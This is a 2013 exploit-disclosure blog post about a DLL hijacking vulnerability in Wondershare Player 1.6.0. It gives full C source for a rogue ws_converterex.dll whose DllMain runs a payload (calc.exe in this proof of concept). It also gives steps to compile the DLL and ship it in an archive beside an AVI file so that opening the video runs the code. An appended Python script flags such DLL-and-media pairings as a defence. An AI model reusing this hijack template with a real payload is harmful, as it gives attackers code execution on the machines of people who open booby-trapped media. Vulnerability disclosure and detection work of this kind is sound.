Wednesday, 27 November 2013

Wondershare Player 1.6.0 (ws_converterex.dll) - DLL Hijacking (0-day)

Greetings,

While once again working on shellcoding and exploitation techniques, I discovered a DLL hijacking vulnerability in a well-known video player, similar to the one in BZR Player. After sharing the exploit on various security sites, I thought it would be appropriate to share it here as well.

Exploit Proof Video:


Exploit Code:

/* # Exploit Title: Wondershare Player 1.6.0 (ws_converterex.dll) - DLL Hijacking Vulnerability
// # Date: 27.11.2013
// # Exploit Author: Akin Tosunlar
// # Software Link: http://download.wondershare.com/player_full1374.exe
// # Version: 1.6.0 (Probably old version of software and the LATEST version too)
// # Vendor Homepage: http://www.wondershare.com
// # Tested on: [ Windows XP sp3]
// # Contact : info@vigasis.com
// #------------------
// # Web Page : http://www.vigasis.com
// #
// # YOUTUBE EXPLOIT VIDEO: https://www.youtube.com/watch?v=EKu_-uKKmDA
// #
// #  gcc -shared -o ws_converterex.dll evil.c
// #  Compile evil.c, then rar or zip an AVI file and ws_converterex.dll in the same folder. Set Wondershare Player as the default player, or use Open With Wondershare Player. Double-click the AVI file. The program starts Calc.exe immediately.
// #
*/


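#include <windows.h>
#include <stdlib.h>   /* exit() */

/* Proof-of-concept payload: launch Calculator, then terminate the host process. */
int evilcode()
{
    WinExec("calc", 0);
    exit(0);
    return 0;   /* not reached */
}

/* Called by the loader when the player loads this DLL; the payload runs for any fdwReason. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    evilcode();
    return 0;   /* not reached: evilcode() exits the process */
}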

Thanks.
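A defensive check for the delivery pattern described in the exploit header (a DLL packed in the same folder as a media file), added here as an example and not part of the original post: it lists every DLL that shares a folder with a media file inside a zip archive. The function names and the media extension list are assumptions, and the sample archive is constructed in memory.

```python
import io
import zipfile
from pathlib import PurePosixPath

MEDIA_EXT = {".avi", ".mp4", ".mkv", ".wmv", ".flv", ".mov", ".mp3"}  # assumed list
LIB_EXT = {".dll"}


def find_colocated_dlls(archive):
    """Return sorted (folder, dll, media) tuples where a DLL shares a folder with media.

    `archive` is a path or binary file object accepted by zipfile.ZipFile.
    """
    by_folder = {}
    with zipfile.ZipFile(archive) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Zip entries use '/', but tolerate '\\' written by some Windows tools.
            p = PurePosixPath(info.filename.replace("\\", "/"))
            ext = p.suffix.lower()
            kind = "dll" if ext in LIB_EXT else "media" if ext in MEDIA_EXT else None
            if kind:
                slot = by_folder.setdefault(str(p.parent), {"dll": [], "media": []})
                slot[kind].append(p.name)
    hits = []
    for folder, names in by_folder.items():
        for dll in names["dll"]:
            for media in names["media"]:
                hits.append((folder, dll, media))
    return sorted(hits)


def constructed_zip(names):
    """Build an in-memory zip of empty placeholder files (constructed sample input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n in names:
            zf.writestr(n, b"")
    buf.seek(0)
    return buf


if __name__ == "__main__":
    sample = constructed_zip(
        ["movies/holiday.avi", "movies/ws_converterex.dll", "docs/readme.txt"])
    for folder, dll, media in find_colocated_dlls(sample):
        print(f"ALERT: {dll} sits beside {media} in '{folder}'")
```

A hit is a reason to inspect the archive before extracting it, not proof of malice, since some legitimate packages ship DLLs alongside media.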
